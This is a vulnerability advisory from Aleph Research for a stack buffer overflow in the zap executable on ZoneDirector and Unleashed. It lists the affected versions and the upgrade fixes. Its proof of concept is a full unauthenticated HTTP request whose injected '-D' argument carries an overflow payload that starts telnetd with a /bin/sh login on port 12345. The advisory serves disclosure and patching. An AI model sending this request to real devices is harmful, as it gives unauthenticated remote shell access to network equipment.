
Stack buffer overflow in zap executable

Aleph Research Advisory

Identifier

Severity

Critical

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Mitigation

  • 9.10.x: Upgrade to 9.10.2.0.84
  • 9.12.x: Upgrade to 9.12.3.0.136
  • 9.13.x: Upgrade to 10.0.1.0.90
  • 10.0.x: Upgrade to 10.0.1.0.90
  • 10.1.x: Upgrade to 10.1.2.0.275
  • 10.2.x: Upgrade to 10.2.1.0.147
  • 10.3.x: Upgrade to 10.3.1.0.21
  • 200.6 and before: Upgrade to 200.7.10.202.94
  • 200.7: Upgrade to 200.7.10.202.94

Technical Details

Stack buffer overflow/remote code execution vulnerability via a crafted unauthenticated HTTP request

The zap executable contains an unsafe strncpy() in its “-D” argument parser: the argument value is copied into a fixed-size stack buffer without being bounded by the buffer's size, so an over-long “-D” value overflows the stack and can be used to run arbitrary code. zap is not meant to receive attacker-chosen arguments; CVE-2019-19836 allows unintended arguments (such as “-D”) to be passed to it, which is how the proof of concept below reaches the vulnerable parser.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.

Proof Of Concept

Stack buffer overflow in the zap executable triggered by an unauthenticated ajax request (the “-D” value is injected through the server parameter; the non-printable bytes in the payload are the binary part of the exploit and are shown as rendered):

POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 473

<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='1.1.1.1' tool='zap-up' zap-type='udp' server='1.1.1.2 -D/tmp/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0A2p������p���5Ad6$r��d8Ad9Ae0Ae1A3Ae4Ae5Ae6A,e7AeCCCCDDDD������������f5Af6Af7,CCCC,telnetd,-l/bin/sh,-p12345' syspmtu=65500 />
</ajax-request>

Timeline

Posts

Credit

External References